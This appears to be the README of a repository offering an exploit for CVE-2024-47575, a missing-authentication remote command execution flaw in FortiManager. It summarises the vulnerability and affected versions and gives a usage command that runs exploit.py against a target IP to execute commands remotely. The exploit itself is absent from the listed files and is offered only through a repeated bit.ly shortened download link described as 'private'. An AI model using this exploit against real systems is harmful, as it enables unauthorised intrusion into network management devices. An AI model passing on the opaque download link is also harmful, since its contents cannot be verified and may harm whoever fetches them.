# CVE-2024-47575: FortiManager Missing Authentication
## Overview
CVE-2024-47575
A missing authentication for critical function in FortiManager allows attacker to execute arbitrary code or commands via specially crafted requests.
## Exploit:
### [Download here](https://bit.ly/3US7qb1)
## Details
- **CVE ID**: [CVE-2024-47575](https://nvd.nist.gov/vuln/detail/CVE-2024-47575)
- **Published**: 2024-10-23
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 9.8
## Vulnerability Description
CVE-2024-47575 is a critical vulnerability in the FortiManager platform, specifically affecting its fgfmsd daemon. Classified under CWE-306, it stems from insufficient authentication for management functions in the fgfmsd service, which handles communication between FortiManager and FortiGate devices.
This flaw allows a remote attacker to send crafted requests, bypass access controls, and execute arbitrary commands on the FortiManager system, potentially compromising the network.
## Affected Versions
**FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4.1 through 6.4.7**
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Exploit:
### [Download here](https://bit.ly/3US7qb1)



[4.0K] /data/pocs/71d568fa1d5a4308f14ebf31ce931644d7e62031
├── [ 56K] fortinet-zero-day-fig2.max-600x600.png
├── [197K] fortinet-zero-day-fig5a.max-1100x1100.png
├── [ 57K] photo_2024-11-15_21-54-16.jpg
└── [1.9K] README.md
0 directories, 4 files